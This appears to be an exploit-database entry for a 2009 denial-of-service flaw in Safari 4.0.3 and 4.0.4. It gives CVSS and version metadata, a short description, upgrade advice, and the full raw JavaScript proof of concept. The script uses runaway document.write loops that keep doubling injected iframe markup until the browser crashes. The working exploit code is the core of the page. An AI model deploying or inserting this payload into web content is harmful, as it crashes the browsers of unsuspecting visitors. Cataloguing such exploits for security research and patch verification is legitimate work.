header-logo
Suggest Exploit
vendor:
Safari
by:
Fredrik Nordberg Almroth
7,5
CVSS
HIGH
Denial of Service
20
CWE
Product Name: Safari
Affected Version From: 4.0.3
Affected Version To: 4.0.4
Patch Exists: YES
Related CWE: N/A
CPE: apple:safari
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Mac, Linux
2009

Safari 4.0.3 & 4.0.4 Denial of Service Vulnerability

This exploit is a Denial of Service vulnerability in Safari 4.0.3 & 4.0.4. It is written in JavaScript and causes an infinite loop of iframes to be created, which eventually causes the browser to crash. Other versions of Safari may also be vulnerable.

Mitigation:

Upgrade to the latest version of Safari.
Source

Exploit-DB raw data:

<script>
//Written by: Fredrik Nordberg Almroth
//URL: http://h.ackack.net/
//Affected: Safari 4.0.3 & 4.0.4 - Other versions might be vulnerable aswell.
  a="<script>var b=\"<iframe src='javascript:window.location=\"boom\"'></iframe>\";while(1){b=b+b;document.write(b);}</scr"+"ipt>";
  while(1){
    a=a+a;
    document.write(a);
  }
</script>

Navigation

Suggest Exploit

Services By CQR